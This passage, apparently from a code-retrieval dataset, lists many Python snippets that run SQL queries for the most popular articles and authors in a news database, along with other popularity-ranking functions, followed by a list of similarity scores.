authors.name from articles \"\n + \" inner join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \" inner join authors on articles.author = authors.id \"\n + \"group by name order by views desc; \")\n authors = c.fetchall()\n db.close()\n return authors", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def print_authors(popular_authors):\n\n print('\\nThe list of authors being listed as per their popularity:\\n')\n for author in popular_authors:\n print(author[0] + '\\t-\\t' + str(author[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path \n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in 
rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def recommend_for_new_user(titles=False, n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = 
connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def print_top_authors():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n create_view_top_authors = (\n \"CREATE VIEW top_authors as \" +\n \"SELECT sum(num) as views, author \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path LIKE '%' || articles.slug GROUP BY author;\")\n get_popular_artists = (\n \"SELECT name, views \" +\n \"FROM authors, top_authors \" +\n \"WHERE top_authors.author = authors.id ORDER BY views DESC;\")\n\n print(\"\\nRunning Task: \" + print_top_authors.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(create_view_top_authors)\n cur.execute(get_popular_artists)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t\\\"{}\\\" - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def more_popular(twitter_data, a, b):\r\n \r\n a_popularity = len(all_followers(twitter_data, a)) \r\n b_popularity = len(all_followers(twitter_data, b))\r\n if a_popularity > b_popularity:\r\n return -1\r\n if a_popularity < b_popularity:\r\n return 1\r\n return username_first(twitter_data, a, b)", "def _get_sorted_trend_setters(authors: list) -> dict:\n\n trend_setters = {author: authors.count(author) for author in authors}\n top_trend_setters = dict(sorted(\n trend_setters.items(), key=lambda item: item[1], reverse=True\n ))\n return top_trend_setters", "def get_n_authors(soup):\n n_authors = len(soup.find_all(attrs={\"name\":\"Author\"}))\n return(n_authors)", "def more_popular(twitter_data, a, b):\n\n a_popularity = len(all_followers(twitter_data, a))\n b_popularity = len(all_followers(twitter_data, b))\n if a_popularity > b_popularity:\n return -1\n if a_popularity < b_popularity:\n return 1\n return username_first(twitter_data, a, b)", "def author_entity_frequency_and_popularity(self, author_id):\n return self.db.execute(u'''\n SELECT e.entity, author_freq, SUM(e.frequency) AS entity_popularity, years, max_rho\n FROM entities AS e,\n (\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? 
AND rho > ?\n GROUP BY entity\n ) as d_e\n WHERE d_e.entity == e.entity GROUP BY e.entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def query2():\n\n print(\"2. Who are the most popular article authors of all time?\\n\")\n\n query = \"\"\"\n SELECT authors.name, subq_author.hits FROM authors\n LEFT JOIN\n (SELECT articles.author, CAST(SUM(subq_article.hits) AS INTEGER)\n AS hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq_article\n ON subq_article.path LIKE '/article/'||articles.slug\n GROUP BY articles.author) AS subq_author\n ON authors.id = subq_author.author\n ORDER BY subq_author.hits DESC;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Author: '{}' - {} views\".format(*j))", "def author_articles(self):\n return ArticlePage.objects.live().filter(author=self).order_by('-date')", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def nauthors(self):\n return self._nauthors", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def get_authors_query():\n\n query = '''select authors.name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and substr(log.path,10)=articles.slug\n group by authors.name order by views desc;'''\n\n return query", "def question_2():\n cursor.execute(mostPopAuthors)\n output = cursor.fetchall()\n return output", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def ef_iaf_author(self, author_id):\n total_papers = self.total_papers()\n author_entity_frequency = self.author_entity_frequency_and_popularity(author_id)\n author_papers = self.author_papers_count(author_id)\n return sorted(((\n entity,\n entity_author_freq / float(author_papers),\n log(total_papers/float(entity_popularity)),\n entity_author_freq / float(author_papers) * log(total_papers/float(entity_popularity)),\n max_rho,\n [int(y) for y in years.split(\",\")],\n ) for entity, entity_author_freq, 
entity_popularity, years, max_rho in author_entity_frequency), key=lambda t: t[3], reverse=True)", "def top_three_articles():\n query = \"\"\"select articles.title,\n article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def scrape_author(self, author_name, min_len=0, max_len=9999):\n search = sc.search_author(author_name)\n author = next(search)\n sc.fill(author, sections=['publications'])\n print(author.keys())\n with open(\n 'loadings\\\\authors_papers\\\\{}.txt'.format(author_name),\n 'w',\n encoding='utf-8'\n ) as file:\n for counter, pubblication in enumerate(author['publications']):\n\n if len(pubblication['bib']['title']) < min_len \\\n or len(pubblication['bib']['title']) > max_len:\n continue\n file.write(pubblication['bib']['title'])\n file.write('\\n')\n counter += 1\n if counter > self.hard_limit:\n break", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def get_movie_most_nominations(movies: list) -> str:\n pass", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def createAuthorArticlePopularityView():\n query = \"\"\"\n CREATE TEMPORARY VIEW author_article_popularity_view AS\n SELECT COUNT(log.path) AS views,\n author_article_view.title AS article,\n author_article_view.author AS author\n FROM author_article_view LEFT JOIN log\n ON log.path LIKE '%' || author_article_view.slug || '%'\n GROUP BY article, author\n ORDER BY views DESC;\n \"\"\"\n connection.cursor().execute(query)", "def get_article_author(self, article_webpage):\n pass", "def citing_authors(self, entities):\n result = self.db.execute(u'''SELECT DISTINCT(author_id)\n FROM \"entity_occurrences\"\n WHERE entity IN ({}) AND rho > ?'''.format(join_entities_sql(entities)), (DEFAULT_MIN_SCORE,)).fetchall()\n return [t[0] for t in result]", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return 
res", "def directorsOfMostMovies (movies, count):\n directorCounts = {}\n for movieInfo in movies.values():\n key = movieInfo[1]\n if key not in directorCounts:\n directorCounts[key] = 0\n directorCounts[key] += 1\n return sorted([ (v, k) for (k,v) in directorCounts.items() ], reverse=True)[:count]\n # OR:\n # directors = [ x[1] for x in movies.values() ]\n # directorSet = set(directors)\n # return sorted([ (directors.count(d), d) for d in directorSet ], reverse=True)[:count]", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def author_entity_frequency(self, author_id):\n return self.db.execute(u'''\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def AuthorsCount(self, default=None):\n return self.data.get('metadata', {}).get('author_count', default)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). 
\\\n order_by('likes_count')", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def top_controversial(self, n):\n return top_movies", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def test_discussion_filter_author(self):\n author_vals = (\n ('DoesNotExist', 0),\n ('admin', 1),\n ('jsocol', 4),\n )\n\n for name, number in author_vals:\n u = UserFactory(username=name)\n for i in range(number):\n thread1 = ThreadFactory(title=u'audio')\n PostFactory(thread=thread1, author=u)\n\n self.refresh()\n\n qs = {'a': 1, 'w': 4, 'format': 'json'}\n\n for author, total in author_vals:\n qs.update({'author': author})\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(total, json.loads(response.content)['total'])", "def most_popular(self, n):\n return popular_tags", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def getAuthor(self):\n\t\tself.authorList = [submission.author for submission in self.subreddit.top(time_filter = 'day', limit = self.limits)]\n\t\treturn self.authorList", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def get_most_popular_annotations(ambiguous_entity, k=2):\n freq = [(key, len(value)) for key, value in ambiguous_entity.annotated_corpus.items()]\n freq = sorted(freq, key=lambda x: x[1], reverse=True)\n return [x[0] for x in freq[:k]]", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def author_visualisation(self, spam_collection):\n\n spam_author_collection = dict.fromkeys(spam_collection)\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] = 1\n\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] += 1\n\n spam_list = sorted(spam_author_collection.items(), key=operator.itemgetter(1))\n\n group = []\n values = []\n iterator = 5\n for spam in reversed(spam_list):\n group.append(spam[0])\n 
values.append(spam[1])\n if iterator == 0:\n break\n iterator -= 1\n\n y_pos = np.arange(len(group))\n\n plt.barh(y_pos, values, align='center', alpha=0.5)\n plt.yticks(y_pos, group)\n plt.xlabel('Number of Spam Comments')\n plt.ylabel('YouTube Author')\n plt.title('Top 5 Spamming Authors \\nin YouTube Comment Corpus')\n\n plt.show()", "def get_word_counts(messages_by_author):\n counters_by_author = {}\n for author in messages_by_author.keys():\n author_counter = Counter()\n for message in messages_by_author[author]:\n author_counter += Counter(get_words(string_to_onlyalpha(message.content)))\n counters_by_author[author] = author_counter\n return counters_by_author", "def get_most_popular_merchants(self):\n if self.model:\n return self.model.wv.index_to_key[: self.num_rec]\n else:\n print(\"train the model before performing this step\")\n return None", "def popularity(self, user_list):\n item_popular = Counter(self.train['movieId'].values)\n ret = 0\n n = 0\n print('\\nCalculate popularity: ')\n for user in tqdm(user_list):\n recom_data = self._get_recommend(user)\n for rec in set([data[0] for data in recom_data]):\n ret += math.log(1 + item_popular.get(rec))\n n += 1\n ret /= n * 1.0\n print('\\npopularity: ', ret)\n return ret", "def print_top_articles():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n get_popular_articles_names = (\n \"SELECT title, num \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path = '/article/' || articles.slug limit 3;\")\n\n print(\"\\nRunning Task: \" + print_top_articles.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(get_popular_articles_names)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t{} - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def get_artists_most_played(session_):\n # artists = session_.query(Artist).order_by(Artist.name.asc()).paginate()\n artists = session_.query(Artist).order_by(Artist.plays.desc()).all()\n return artists", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_missed_creators(self, cache_max_age=0):\n expected_items = []\n query = u'CLAIM[195:%s] AND NOCLAIM[170]' % \\\n ',195:'.join(self.collections) # collection\n wd_queryset = wdquery.QuerySet(query)\n\n wd_query = wdquery.WikidataQuery(cacheMaxAge=cache_max_age)\n data = wd_query.query(wd_queryset)\n\n if data.get('status').get('error') == 'OK':\n expected_items = data.get('items')\n\n creator_dict = {}\n counter = 0\n for q_val in expected_items:\n q_item = self.wd.QtoItemPage(q_val)\n data = q_item.get()\n claims = data.get('claims')\n if u'P170' in claims:\n continue\n descr = data.get('descriptions').get('en')\n if descr and descr.startswith(u'painting by '):\n creator = descr[len(u'painting by '):]\n if '(' in creator: # to get rid of disambiguation addition\n 
creator = creator[:creator.find('(')].strip()\n if creator in creator_dict.keys():\n creator_dict[creator] += 1\n else:\n creator_dict[creator] = 1\n counter += 1\n pywikibot.output(u'Found %d mentions of %d creators' %\n (counter, len(creator_dict)))\n # output\n f = codecs.open(u'creatorHitlist.csv', 'w', 'utf-8')\n for k, v in creator_dict.iteritems():\n f.write(u'%d|%s\\n' % (v, k))\n f.close()", "def get_authors_count(self, institution):\n return self.db.execute(u'''SELECT COUNT(*) FROM authors WHERE institution==?''', (institution,)).fetchall()[0][0]", "def get_most_popular(self):\n\t\tpopular_rated = self.data_final[self.data_final['Rating'] == 10]\n\t\tpopular_jokes = popular_rated.groupby('JokeID').count().reset_index()\n\t\tpopular_jokes = popular_jokes[['JokeID','Rating']]\n\t\tpopular_jokes.columns = ['JokeID','Number_rated10']\n\t\ttop_joke = popular_jokes.sort_values(by=['Number_rated10'], ascending=False).head(1)\n\t\ttop_joke_val = top_joke['JokeID'].values[0]\n\t\tjokes_list = sorted(set(self.data_final['JokeID']))\n\t\tjoke_num = jokes_list.index(top_joke_val)\n\t\ttop_joke_desc = self.data_jokes[self.data_jokes['JokeID'] == top_joke_val].values[0][1]\n\n\t\treturn top_joke_desc, joke_num", "def count_word_usage(counters_by_author, word_list):\n specific_word_counter = {}\n for author in counters_by_author.keys():\n word_counter = Counter()\n for item in counters_by_author[author]:\n for word in word_list:\n if word in item:\n print(item)\n word_counter[word] += counters_by_author[author][item]\n specific_word_counter[author] = word_counter\n return specific_word_counter", "def get_ars(self, author):\n return self.divided[author][:-1]" ]
[ "0.84637415", "0.8395699", "0.8325273", "0.8321845", "0.8157658", "0.80273575", "0.7990549", "0.7792252", "0.77818847", "0.7686615", "0.7682264", "0.76261973", "0.75585544", "0.7522089", "0.7496455", "0.73912114", "0.7381132", "0.735024", "0.73232555", "0.7270634", "0.7169818", "0.7095853", "0.7026694", "0.70194745", "0.69743323", "0.6874296", "0.6849663", "0.6833659", "0.67938805", "0.6748801", "0.6726414", "0.67242295", "0.6662603", "0.6633716", "0.6553412", "0.6537264", "0.6521089", "0.6444699", "0.6391774", "0.63315666", "0.63079435", "0.62826186", "0.62631345", "0.61919844", "0.6156478", "0.61327577", "0.61229473", "0.6074733", "0.6030435", "0.6030301", "0.6008949", "0.6004238", "0.5970723", "0.5959741", "0.59556615", "0.59487104", "0.5947171", "0.5936569", "0.5932458", "0.5917469", "0.59126264", "0.5858251", "0.58462816", "0.5837916", "0.580749", "0.57878405", "0.5779664", "0.57781", "0.5770056", "0.5768499", "0.57487106", "0.57287484", "0.57282513", "0.5705889", "0.5703658", "0.56998706", "0.5691021", "0.56820655", "0.5673636", "0.5672209", "0.56129634", "0.56022006", "0.55984503", "0.5589036", "0.5577613", "0.557558", "0.55661345", "0.5565078", "0.55430865", "0.5499661", "0.5481679", "0.5472018", "0.5471405", "0.54623276", "0.54582757", "0.5458091", "0.54483646", "0.54405403", "0.54369015", "0.5436589", "0.5434653" ]
0.0
-1
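The negatives above share one join pattern: matching log.path against '/article/' || articles.slug and grouping by author. A minimal consolidated sketch of that pattern, with the authors/articles/log schema assumed from the snippets themselves (this is not any one snippet's exact query):

import psycopg2

# Sketch only: the schema (authors, articles, log) is assumed from the snippets above.
def top_authors(limit=3):
    db = psycopg2.connect("dbname=news")
    c = db.cursor()
    c.execute("""
        SELECT authors.name, COUNT(*) AS views
        FROM authors
        JOIN articles ON articles.author = authors.id
        JOIN log ON log.path = '/article/' || articles.slug
        GROUP BY authors.name
        ORDER BY views DESC
        LIMIT %s;
    """, (limit,))
    rows = c.fetchall()
    db.close()
    return rows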
Returns an "absolute" value for a timedelta, always representing a time distance.
import datetime


def abs_timedelta(delta):
    """Return an "absolute" value for a timedelta, always a time distance."""
    if delta.days < 0:
        now = datetime.datetime.now()
        return now - (now + delta)
    return delta
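A quick sanity check of the behaviour the query describes, using only the stdlib and assuming abs_timedelta from the document above is in scope: a negative delta comes back as the equivalent positive distance, and a non-negative one is returned unchanged.

import datetime

delta = datetime.timedelta(seconds=-30)      # normalizes to days=-1, seconds=86370
print(abs_timedelta(delta))                  # 0:00:30, the positive time distance
print(abs_timedelta(datetime.timedelta(2)))  # 2 days, 0:00:00, unchanged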
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def abs_timedelta(delta):\r\n if delta.days < 0:\r\n now = _now()\r\n return now - (now + delta)\r\n return delta", "def delta(self, abs_value=False):\n return self.current - self.last if not abs_value else np.abs(self.current - self.last)", "def timedelta(self) -> datetime.timedelta:\n factor = -1 if self.negative else 1\n return datetime.timedelta(\n hours=factor * self.hours, minutes=factor * self.minutes\n )", "def abs(value):\n return _abs(value)", "def day_absolute_to_relative(absolute):\n today = datetime.datetime.today()\n date = datetime.datetime.strptime(absolute, \"%Y-%m-%d\")\n return abs((today - date).days)", "def abs(self, a):\n return abs(a)", "def delta(self) -> timedelta:\n delta = self.data.get(\"delta\", 0)\n return timedelta(seconds=delta)", "def apparent_to_absolute_magnitude(apparent_magnitude, distance):\n distance_in_parsecs = distance / (648000. * astronomical_unit / np.pi)\n absolute_magnitude = apparent_magnitude - 5*np.log10(distance_in_parsecs) + 5\n return absolute_magnitude", "def abs_(a):", "def get_absolute_datetime(reference, offset):\n absolute_datetime = reference + datetime.timedelta(seconds=offset)\n\n return absolute_datetime", "def __abs__(self):\n return Quantity(abs(self._value), self.unit)", "def create_timedelta():\n # timedelta(days, seconds, microseconds, milliseconds, minutes, hours, weeks)\n td = datetime.timedelta(microseconds=-1)\n # Why is this (-1, 86399, 999999)?\n # Because -1 days + (86,400 - 1) seconds = -1 second, and -1,000,000 microseconds + 999,999 microseconds = -1 microsecond\n print(td.days, td.seconds, td.microseconds) # (-1, 86399, 999999)", "def __abs__(self):\n retval = self.copy()\n retval._val = abs(retval._val)\n return retval", "def abs(self):\n\n return self._get(\"abs\", rtype=self.__class__)", "def eta(self):\n eta = self.fields['eta']\n if eta >= 0:\n return datetime.timedelta(seconds=eta)\n else:\n ValueError('eta not valid')", "def _convert_to_timedelta(time_diff):\n return timedelta(seconds=time_diff)", "def absolute_value(val):\n if val < 0:\n return val * -1\n else:\n return val", "def as_duration(abs_time_in_seconds):\n\n durations = (\n ('s', 1),\n ('m', 60),\n ('h', 60 * 60),\n ('d', 60 * 60 * 24),\n ('w', 60 * 60 * 24 * 7)\n )\n\n duration = time.time() - abs_time_in_seconds\n result = \"now\"\n\n for label, length in durations:\n if length > duration:\n break\n result = \"{:.0f}{}\".format(math.ceil(duration / length), label)\n\n return result", "def day_relative_to_absolute(relative):\n today = datetime.datetime.today()\n delta = datetime.timedelta(days=relative)\n return (today - delta).strftime(\"%Y-%m-%d\")", "def duration(self):\n # type: () -> Optional[timedelta]\n\n if self.datetime_start and self.datetime_complete:\n return self.datetime_complete - self.datetime_start\n else:\n return None", "def find_absolute_value(x):\n return math.fabs(x)", "def abs(self):\n\n return Number.abs(self)", "def _abs (x):\n\n return x if le(nil,x) else -x", "def _convert_to_timedelta(time_diff):\n return timedelta(microseconds=time_diff / _NANO_TO_MICRO)", "def abs(self):\n return self * self.sign()", "def timedelta(self, *a, **kw):\n from datetime import timedelta\n return timedelta(*a, **kw)", "def resolve(self):\n addl_micros = round(self.nanoseconds / 1000)\n return self.td + datetime.timedelta(microseconds=addl_micros)", "def absulute2relative_time(x): \n if x.viewed:\n x.viewed_reltime=x.viewed_time-x.start\n \n if x.completed:\n x.completed_reltime=x.completed_time-x.start\n \n return x", "def 
